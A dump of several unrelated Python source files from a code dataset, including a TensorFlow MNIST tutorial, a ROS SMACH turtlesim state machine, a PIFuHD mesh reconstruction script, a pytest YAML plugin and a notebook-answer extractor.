Epoch: 0003 cost = 23.977515479
Epoch: 0004 cost = 16.315132428
Epoch: 0005 cost = 11.702554882
Epoch: 0006 cost = 8.573139748
Epoch: 0007 cost = 6.370995680
Epoch: 0008 cost = 4.537178684
Epoch: 0009 cost = 3.216900532
Epoch: 0010 cost = 2.329708954
Epoch: 0011 cost = 1.715552875
Epoch: 0012 cost = 1.189857912
Epoch: 0013 cost = 0.820965160
Epoch: 0014 cost = 0.624131458
Epoch: 0015 cost = 0.454633765
Learning Finished!
Accuracy: 0.9455
'''
| 30.631579 | 78 | 0.713746 |
import tensorflow as tf
import random
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777)
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
| true | true |
f72edefdeaa956c002a8aa8310ace417a58e9aff | 5,653 | py | Python | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 3 | 2021-12-30T21:56:58.000Z | 2022-02-20T11:19:12.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 10 | 2021-11-13T21:18:33.000Z | 2022-03-11T23:11:23.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 2 | 2022-02-06T11:24:43.000Z | 2022-02-09T20:13:40.000Z | #!/usr/bin/env python3
"""
Description:
Usage:
$> roslaunch turtle_nodes.launch
$> ./executive_step_06.py
Output:
[INFO] : State machine starting in initial state 'RESET' with userdata:
[INFO] : State machine transitioning 'RESET':'succeeded'-->'SPAWN'
[INFO] : State machine transitioning 'SPAWN':'succeeded'-->'TELEPORT1'
[INFO] : State machine transitioning 'TELEPORT1':'succeeded'-->'TELEPORT2'
[INFO] : State machine transitioning 'TELEPORT2':'succeeded'-->'DRAW_SHAPES'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : State machine starting in initial state 'DRAW_WITH_MONITOR' with userdata:
[]
[INFO] : Concurrence starting with userdata:
[]
[WARN] : Still waiting for action server 'turtle_shape1' to start... is it running?
[WARN] : Still waiting for action server 'turtle_shape2' to start... is it running?
[INFO] : Connected to action server 'turtle_shape2'.
[INFO] : Connected to action server 'turtle_shape1'.
[INFO] : Preempt requested on action 'turtle_shape2'
[INFO] : Preempt on action 'turtle_shape2' cancelling goal:
edges: 6
radius: 0.5
[INFO] : Concurrent Outcomes: {'MONITOR': 'invalid', 'DRAW': 'preempted'}
[INFO] : State machine transitioning 'DRAW_WITH_MONITOR':'interrupted'-->'WAIT_FOR_CLEAR'
[INFO] : State machine transitioning 'WAIT_FOR_CLEAR':'invalid'-->'DRAW_WITH_MONITOR'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : Concurrent Outcomes: {'MONITOR': 'preempted', 'DRAW': 'succeeded'}
[INFO] : State machine terminating 'DRAW_WITH_MONITOR':'succeeded':'succeeded'
[INFO] : Concurrent Outcomes: {'SMALL': 'succeeded', 'BIG': 'succeeded'}
[INFO] : State machine terminating 'DRAW_SHAPES':'succeeded':'succeeded'
"""
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
rospy.init_node('smach_usecase_step_06')
# Construct static goals
polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
# Create a SMACH state machine
sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
# Open the container
with sm0:
# Reset turtlesim
StateMachine.add('RESET',
ServiceState('reset', std_srvs.srv.Empty),
{'succeeded':'SPAWN'})
# Create a second turtle
StateMachine.add('SPAWN',
ServiceState('spawn', turtlesim.srv.Spawn,
request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
{'succeeded':'TELEPORT1'})
# Teleport turtle 1
StateMachine.add('TELEPORT1',
ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
{'succeeded':'TELEPORT2'})
# Teleport turtle 2
StateMachine.add('TELEPORT2',
ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
{'succeeded':'DRAW_SHAPES'})
# Draw some polygons
shapes_cc = Concurrence(
outcomes=['succeeded','aborted','preempted'],
default_outcome='aborted',
outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
StateMachine.add('DRAW_SHAPES',shapes_cc)
with shapes_cc:
# Draw a large polygon with the first turtle
Concurrence.add('BIG',
SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
goal = polygon_big))
# Draw a small polygon with the second turtle
draw_monitor_cc = Concurrence(
['succeeded','aborted','preempted'],
'aborted',
child_termination_cb = lambda so: True,
outcome_map = {
'succeeded':{'DRAW':'succeeded'},
'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
'aborted':{'MONITOR':'invalid'}})
Concurrence.add('SMALL',draw_monitor_cc)
with draw_monitor_cc:
Concurrence.add('DRAW',
SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
goal = polygon_small))
def turtle_far_away(ud, msg):
"""Returns True while turtle pose in msg is at least 1 unit away from (9,5)"""
if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
return True
return False
Concurrence.add('MONITOR',
MonitorState('/turtle1/pose',turtlesim.msg.Pose,
cond_cb = turtle_far_away))
# Attach a SMACH introspection server
sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
sis.start()
# Set preempt handler
smach.set_preempt_handler(sm0)
# Execute SMACH tree in a separate thread so that we can ctrl-c the script
smach_thread = threading.Thread(target = sm0.execute)
smach_thread.start()
# Signal handler
rospy.spin()
if __name__ == '__main__':
main()
| 39.809859 | 111 | 0.61401 |
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
rospy.init_node('smach_usecase_step_06')
polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
with sm0:
StateMachine.add('RESET',
ServiceState('reset', std_srvs.srv.Empty),
{'succeeded':'SPAWN'})
StateMachine.add('SPAWN',
ServiceState('spawn', turtlesim.srv.Spawn,
request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
{'succeeded':'TELEPORT1'})
StateMachine.add('TELEPORT1',
ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
{'succeeded':'TELEPORT2'})
StateMachine.add('TELEPORT2',
ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
{'succeeded':'DRAW_SHAPES'})
shapes_cc = Concurrence(
outcomes=['succeeded','aborted','preempted'],
default_outcome='aborted',
outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
StateMachine.add('DRAW_SHAPES',shapes_cc)
with shapes_cc:
Concurrence.add('BIG',
SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
goal = polygon_big))
draw_monitor_cc = Concurrence(
['succeeded','aborted','preempted'],
'aborted',
child_termination_cb = lambda so: True,
outcome_map = {
'succeeded':{'DRAW':'succeeded'},
'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
'aborted':{'MONITOR':'invalid'}})
Concurrence.add('SMALL',draw_monitor_cc)
with draw_monitor_cc:
Concurrence.add('DRAW',
SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
goal = polygon_small))
def turtle_far_away(ud, msg):
if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
return True
return False
Concurrence.add('MONITOR',
MonitorState('/turtle1/pose',turtlesim.msg.Pose,
cond_cb = turtle_far_away))
sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
sis.start()
smach.set_preempt_handler(sm0)
smach_thread = threading.Thread(target = sm0.execute)
smach_thread.start()
rospy.spin()
if __name__ == '__main__':
main()
| true | true |
f72edff35f01d27c9da2c2eae2c4065b8bc7ba12 | 146 | py | Python | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 71 | 2020-04-15T17:02:42.000Z | 2022-03-26T04:53:51.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 59 | 2020-05-15T03:51:46.000Z | 2022-03-28T13:53:01.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 57 | 2020-06-17T20:34:02.000Z | 2022-03-16T08:09:54.000Z | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| 29.2 | 49 | 0.787671 | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| true | true |
f72ee0a79d6772df7fd35864b092bd02cfb99099 | 8,117 | py | Python | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
# if 'calib_world' in data:
# calib_world = data['calib_world'].numpy()[0]
# verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
color = np.zeros(verts.shape)
interval = 50000
for i in range(len(color) // interval + 1):
left = i * interval
if i == len(color) // interval:
right = -1
else:
right = (i + 1) * interval
net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
color[left:right] = nml.T
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
# if this returns error, projection must be defined somewhere else
xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
uv = xyz_tensor[:, :2, :]
color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
color = color * 0.5 + 0.5
if 'calib_world' in data:
calib_world = data['calib_world'].numpy()[0]
verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def recon(opt, use_rect=False):
# load checkpoints
state_dict_path = None
if opt.load_netMR_checkpoint_path is not None:
state_dict_path = opt.load_netMR_checkpoint_path
elif opt.resume_epoch < 0:
state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
opt.resume_epoch = 0
else:
state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
start_id = opt.start_id
end_id = opt.end_id
cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
state_dict = None
if state_dict_path is not None and os.path.exists(state_dict_path):
print('Resuming from ', state_dict_path)
state_dict = torch.load(state_dict_path, map_location=cuda)
print('Warning: opt is overwritten.')
dataroot = opt.dataroot
resolution = opt.resolution
results_path = opt.results_path
loadSize = opt.loadSize
opt = state_dict['opt']
opt.dataroot = dataroot
opt.resolution = resolution
opt.results_path = results_path
opt.loadSize = loadSize
else:
raise Exception('failed loading state dict!', state_dict_path)
# parser.print_options(opt)
if use_rect:
test_dataset = EvalDataset(opt)
else:
test_dataset = EvalWPoseDataset(opt)
print('test data size: ', len(test_dataset))
projection_mode = test_dataset.projection_mode
opt_netG = state_dict['opt_netG']
netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
def set_eval():
netG.eval()
# load checkpoints
netMR.load_state_dict(state_dict['model_state_dict'])
os.makedirs(opt.checkpoints_path, exist_ok=True)
os.makedirs(opt.results_path, exist_ok=True)
os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
if start_id < 0:
start_id = 0
if end_id < 0:
end_id = len(test_dataset)
## test
with torch.no_grad():
set_eval()
print('generate mesh (test) ...')
for i in tqdm(range(start_id, end_id)):
if i >= len(test_dataset):
break
# for multi-person processing, set it to False
if True:
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
print(save_path)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
else:
for j in range(test_dataset.get_n_person(i)):
test_dataset.person_id = j
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
opt = parser.parse(args)
recon(opt, use_rect)
if __name__ == '__main__':
reconWrapper()
| 36.075556 | 127 | 0.637797 |
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
color = np.zeros(verts.shape)
interval = 50000
for i in range(len(color) // interval + 1):
left = i * interval
if i == len(color) // interval:
right = -1
else:
right = (i + 1) * interval
net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
color[left:right] = nml.T
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
uv = xyz_tensor[:, :2, :]
color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
color = color * 0.5 + 0.5
if 'calib_world' in data:
calib_world = data['calib_world'].numpy()[0]
verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def recon(opt, use_rect=False):
state_dict_path = None
if opt.load_netMR_checkpoint_path is not None:
state_dict_path = opt.load_netMR_checkpoint_path
elif opt.resume_epoch < 0:
state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
opt.resume_epoch = 0
else:
state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
start_id = opt.start_id
end_id = opt.end_id
cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
state_dict = None
if state_dict_path is not None and os.path.exists(state_dict_path):
print('Resuming from ', state_dict_path)
state_dict = torch.load(state_dict_path, map_location=cuda)
print('Warning: opt is overwritten.')
dataroot = opt.dataroot
resolution = opt.resolution
results_path = opt.results_path
loadSize = opt.loadSize
opt = state_dict['opt']
opt.dataroot = dataroot
opt.resolution = resolution
opt.results_path = results_path
opt.loadSize = loadSize
else:
raise Exception('failed loading state dict!', state_dict_path)
if use_rect:
test_dataset = EvalDataset(opt)
else:
test_dataset = EvalWPoseDataset(opt)
print('test data size: ', len(test_dataset))
projection_mode = test_dataset.projection_mode
opt_netG = state_dict['opt_netG']
netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
def set_eval():
netG.eval()
netMR.load_state_dict(state_dict['model_state_dict'])
os.makedirs(opt.checkpoints_path, exist_ok=True)
os.makedirs(opt.results_path, exist_ok=True)
os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
if start_id < 0:
start_id = 0
if end_id < 0:
end_id = len(test_dataset)
ith torch.no_grad():
set_eval()
print('generate mesh (test) ...')
for i in tqdm(range(start_id, end_id)):
if i >= len(test_dataset):
break
if True:
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
print(save_path)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
else:
for j in range(test_dataset.get_n_person(i)):
test_dataset.person_id = j
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
opt = parser.parse(args)
recon(opt, use_rect)
if __name__ == '__main__':
reconWrapper()
| true | true |
f72ee1276e038c14fc8978d9c956dd65a321b3bd | 1,588 | py | Python | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
"""Custom exception for error reporting."""
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
# pseudo check
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
"""Called when self.runtest() raises an exception."""
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| 31.76 | 66 | 0.61398 | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| true | true |
f72ee154024e635c3e3a687f0aa84471ed485cdc | 594 | py | Python | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 19 | 2017-11-06T03:19:37.000Z | 2020-12-05T07:20:52.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 1 | 2017-07-27T17:58:38.000Z | 2017-11-02T07:22:44.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 4 | 2017-12-27T11:05:48.000Z | 2021-03-08T17:12:11.000Z | import json
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | 37.125 | 83 | 0.476431 | import json
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | true | true |
f72ee175ab02cfd09b428ee248b15c9490ae2b60 | 4,403 | py | Python | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | 1 | 2020-09-23T00:57:20.000Z | 2020-09-23T00:57:20.000Z | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null |
import os
subj_name = r'GaHi_subj01/'
